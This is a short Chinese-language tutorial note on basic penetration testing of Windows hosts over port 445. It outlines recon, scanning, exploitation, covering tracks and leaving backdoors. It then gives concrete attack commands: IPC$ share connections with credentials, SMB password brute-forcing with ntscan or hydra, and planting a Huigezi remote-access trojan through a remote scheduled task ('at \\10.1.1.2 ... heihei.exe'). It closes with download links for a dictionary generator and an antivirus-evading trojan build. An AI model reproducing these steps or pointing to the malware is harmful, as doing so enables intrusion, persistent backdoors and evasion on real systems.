day 09 简单渗透测试

目录

• 简单渗透测试思路
  • 0.受权
  • 1.信息收集
  • 2.扫描漏洞
  • 3.漏洞利用
  • 4.提权（shell环境、桌面环境 == 最高权限）
  • 5.毁尸灭迹
  • 6.留后门
  • 7.渗透测试报告
• 简单渗透测试过程
  • 1.445漏洞之 IPC$
  • 2.暴力破解系统密码之445
  • 3.建立后门
• 相关软件下载

简单渗透测试思路

0.受权

1.信息收集

• nslookup 域名 查IP
• nslookup whois 查子域名

2.扫描漏洞

• nmap（扫描软件） scanport（端口扫描）

  且利用 telnet 命令也能够探测：telnet IP 端口号，若标题变成 telnet 则说明开放

• 首先基础扫描 IP 范围 端口

• 而后再根据端口深刻扫描 （IIS，apache，什么网站）

• 高级扫描：

  扫描容器漏洞：如 IIS 漏洞 2003-IIS6.0 或 2008-IIS7.0 版本的

  扫描网站漏洞（SQL 等）

3.漏洞利用

4.提权（shell环境、桌面环境 == 最高权限）

5.毁尸灭迹

6.留后门

7.渗透测试报告

简单渗透测试过程

1.445漏洞之 IPC$

net use f: \\10.1.1.2\share 密码 /user:用户  ==  把分享文件映射到本身电脑
net use f: /del
net use * /del
net use \\10.1.1.2\IPC$ 密码 /user:用户  == IPC漏洞

2.暴力破解系统密码之445

• 软件：ntscan1.0 //也可用 hydra
• 用字典编写软件编写个字典

3.建立后门

• 用灰鸽子制做木马
• copy 植入木马
• net time \\10.1.1.2 查看目标当前时间
• at \\10.1.1.2 11:11 “c:\windows\system32\heihei.exe” 建立一个计划任务，在11:11时运行exe文件

相关软件下载

真空密码字典生成器： https://lanzous.com/ibl5ywd

鸽子牧民战天免杀专版0912： https://lanzous.com/ibl5y7i

内网端口扫描ScanPort： https://lanzous.com/ibl5y1c